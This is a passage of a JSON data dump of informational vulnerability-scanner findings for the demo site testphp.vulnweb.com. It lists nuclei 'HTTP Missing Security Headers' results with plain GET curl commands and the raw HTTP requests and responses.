'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "discovered_date": "2024-11-13T02:41:41.761Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 672, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L", + "discovered_date": "2024-11-13T02:41:41.930Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 673, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:41:42.097Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 674, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:41:42.258Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 675, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:41:42.411Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 676, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "discovered_date": "2024-11-13T02:41:42.583Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 677, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:41:42.740Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 678, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "discovered_date": "2024-11-13T02:41:42.889Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 679, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3L", + "discovered_date": "2024-11-13T02:41:43.040Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Edg/86.0.622.69\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:32 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 680, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3", + "discovered_date": "2024-11-13T02:41:43.202Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 681, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:41:43.351Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 682, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01", + "discovered_date": "2024-11-13T02:41:43.500Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 683, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "discovered_date": "2024-11-13T02:41:43.666Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /_mmServerScripts HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /_mmServerScripts/</title></head>\r\n<body>\r\n<h1>Index of /_mmServerScripts/</h1><hr><pre><a href="../">../</a>\r\n<a href="MMHTTPDB.php">MMHTTPDB.php</a> 11-May-2011 10:27 2111\r\n<a href="mysql.php">mysql.php</a> 11-May-2011 10:27 10634\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 684, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1", + "discovered_date": "2024-11-13T02:41:43.826Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 685, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 